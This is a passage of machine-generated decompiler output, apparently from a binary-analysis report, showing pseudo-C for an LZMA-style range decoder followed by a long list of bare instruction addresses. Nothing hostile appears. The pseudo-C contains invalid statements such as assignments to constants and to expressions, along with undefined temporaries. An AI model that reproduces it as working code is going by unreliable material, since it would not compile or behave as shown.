											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                  0x00000000
                                                  0x00407068
                                                  0x00407068
                                                  0x0040706c
                                                  0x00407095
                                                  0x0040709f
                                                  0x0040706e
                                                  0x00407077
                                                  0x00407084
                                                  0x00407087
                                                  0x004073cb
                                                  0x004073cb
                                                  0x004073ce
                                                  0x004073ce
                                                  0x004073ce
                                                  0x004073d4
                                                  0x004073da
                                                  0x004073e0
                                                  0x004073fa
                                                  0x004073fd
                                                  0x00407403
                                                  0x0040740e
                                                  0x00407410
                                                  0x004073e2
                                                  0x004073e2
                                                  0x004073f1
                                                  0x004073f5
                                                  0x004073f5
                                                  0x0040741a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040741c
                                                  0x00407420
                                                  0x004075cf
                                                  0x004075e5
                                                  0x004075ed
                                                  0x004075f4
                                                  0x004075f6
                                                  0x004075fd
                                                  0x00407601
                                                  0x00407601
                                                  0x0040742c
                                                  0x00407433
                                                  0x0040743b
                                                  0x0040743e
                                                  0x00407441
                                                  0x00407441
                                                  0x00407447
                                                  0x00407447
                                                  0x00406be3
                                                  0x00406be3
                                                  0x00406be3
                                                  0x00406bec
                                                  0x00000000
                                                  0x00000000
                                                  0x00406bf2
                                                  0x00000000
                                                  0x00406bfd
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c06
                                                  0x00406c09
                                                  0x00406c0c
                                                  0x00406c10
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c16
                                                  0x00406c19
                                                  0x00406c1b
                                                  0x00406c1c
                                                  0x00406c1f
                                                  0x00406c21
                                                  0x00406c22
                                                  0x00406c24
                                                  0x00406c27
                                                  0x00406c2c
                                                  0x00406c31
                                                  0x00406c3a
                                                  0x00406c4d
                                                  0x00406c50
                                                  0x00406c5c
                                                  0x00406c84
                                                  0x00406c86
                                                  0x00406c94
                                                  0x00406c94
                                                  0x00406c98
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c88
                                                  0x00406c88
                                                  0x00406c8b
                                                  0x00406c8c
                                                  0x00406c8c
                                                  0x00000000
                                                  0x00406c88
                                                  0x00406c62
                                                  0x00406c67
                                                  0x00406c67
                                                  0x00406c70
                                                  0x00406c78
                                                  0x00406c7b
                                                  0x00000000
                                                  0x00406c81
                                                  0x00406c81
                                                  0x00000000
                                                  0x00406c81
                                                  0x00000000
                                                  0x00406c9e
                                                  0x00406c9e
                                                  0x00406ca2
                                                  0x0040754e
                                                  0x00000000
                                                  0x0040754e
                                                  0x00406cab
                                                  0x00406cbb
                                                  0x00406cbe
                                                  0x00406cc1
                                                  0x00406cc1
                                                  0x00406cc1
                                                  0x00406cc4
                                                  0x00406cc8
                                                  0x00000000
                                                  0x00000000
                                                  0x00406cca
                                                  0x00406cd0
                                                  0x00406cfa
                                                  0x00406d00
                                                  0x00406d07
                                                  0x00000000
                                                  0x00406d07
                                                  0x00406cd6
                                                  0x00406cd9
                                                  0x00406cde
                                                  0x00406cde
                                                  0x00406ce9
                                                  0x00406cf1
                                                  0x00406cf4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d39
                                                  0x00406d3f
                                                  0x00406d42
                                                  0x00406d4f
                                                  0x00406d57
                                                  0x004073cb
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d0e
                                                  0x00406d0e
                                                  0x00406d12
                                                  0x0040755d
                                                  0x00000000
                                                  0x0040755d
                                                  0x00406d1e
                                                  0x00406d29
                                                  0x00406d29
                                                  0x00406d29
                                                  0x00406d2c
                                                  0x00406d2f
                                                  0x00406d32
                                                  0x00406d37
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004073ce
                                                  0x004073ce
                                                  0x004073d4
                                                  0x004073da
                                                  0x004073e0
                                                  0x004073fa
                                                  0x004073fd
                                                  0x00407403
                                                  0x0040740e
                                                  0x00407410
                                                  0x004073e2
                                                  0x004073e2
                                                  0x004073f1
                                                  0x004073f5
                                                  0x004073f5
                                                  0x0040741a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d5f
                                                  0x00406d61
                                                  0x00406d64
                                                  0x00406dd5
                                                  0x00406dd8
                                                  0x00406ddb
                                                  0x00406de2
                                                  0x00406dec
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00406d66
                                                  0x00406d6a
                                                  0x00406d6d
                                                  0x00406d6f
                                                  0x00406d72
                                                  0x00406d75
                                                  0x00406d77
                                                  0x00406d7a
                                                  0x00406d7c
                                                  0x00406d81
                                                  0x00406d84
                                                  0x00406d87
                                                  0x00406d8b
                                                  0x00406d92
                                                  0x00406d95
                                                  0x00406d9c
                                                  0x00406da0
                                                  0x00406da8
                                                  0x00406da8
                                                  0x00406da8
                                                  0x00406da2
                                                  0x00406da2
                                                  0x00406da2
                                                  0x00406d97
                                                  0x00406d97
                                                  0x00406d97
                                                  0x00406dac
                                                  0x00406daf
                                                  0x00406dcd
                                                  0x00406dcf
                                                  0x00000000
                                                  0x00406db1
                                                  0x00406db1
                                                  0x00406db4
                                                  0x00406db7
                                                  0x00406dba
                                                  0x00406dbc
                                                  0x00406dbc
                                                  0x00406dbc
                                                  0x00406dbf
                                                  0x00406dc2
                                                  0x00406dc4
                                                  0x00406dc5
                                                  0x00406dc8
                                                  0x00000000
                                                  0x00406dc8
                                                  0x00000000
                                                  0x00406ffe
                                                  0x00407002
                                                  0x00407020
                                                  0x00407023
                                                  0x0040702a
                                                  0x0040702d
                                                  0x00407030
                                                  0x00407033
                                                  0x00407036
                                                  0x00407039
                                                  0x0040703b
                                                  0x00407042
                                                  0x00407043
                                                  0x00407045
                                                  0x00407048
                                                  0x0040704b
                                                  0x0040704e
                                                  0x0040704e
                                                  0x00407053
                                                  0x00000000
                                                  0x00407053
                                                  0x00407004
                                                  0x00407007
                                                  0x0040700a
                                                  0x00407014
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004070ab
                                                  0x004070af
                                                  0x00000000
                                                  0x00000000
                                                  0x004070b5
                                                  0x004070b9
                                                  0x00000000
                                                  0x00000000
                                                  0x004070bf
                                                  0x004070c1
                                                  0x004070c5
                                                  0x004070c5
                                                  0x004070c8
                                                  0x004070cc
                                                  0x00000000
                                                  0x00000000
                                                  0x0040711c
                                                  0x00407120
                                                  0x00407127
                                                  0x0040712a
                                                  0x0040712d
                                                  0x00407137
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00407122
                                                  0x00000000
                                                  0x00000000
                                                  0x00407143
                                                  0x00407147
                                                  0x0040714e
                                                  0x00407151
                                                  0x00407154
                                                  0x00407149
                                                  0x00407149
                                                  0x00407149
                                                  0x00407157
                                                  0x0040715a
                                                  0x0040715d
                                                  0x0040715d
                                                  0x00407160
                                                  0x00407163
                                                  0x00407166
                                                  0x00407166
                                                  0x00407169
                                                  0x00407170
                                                  0x00407175
                                                  0x00000000
                                                  0x00000000
                                                  0x00407203
                                                  0x00407203
                                                  0x00407207
                                                  0x004075a5
                                                  0x00000000
                                                  0x004075a5
                                                  0x0040720d
                                                  0x00407210
                                                  0x00407213
                                                  0x00407217
                                                  0x0040721a
                                                  0x00407220
                                                  0x00407222
                                                  0x00407222
                                                  0x00407222
                                                  0x00407225
                                                  0x00407228
                                                  0x00000000
                                                  0x00000000
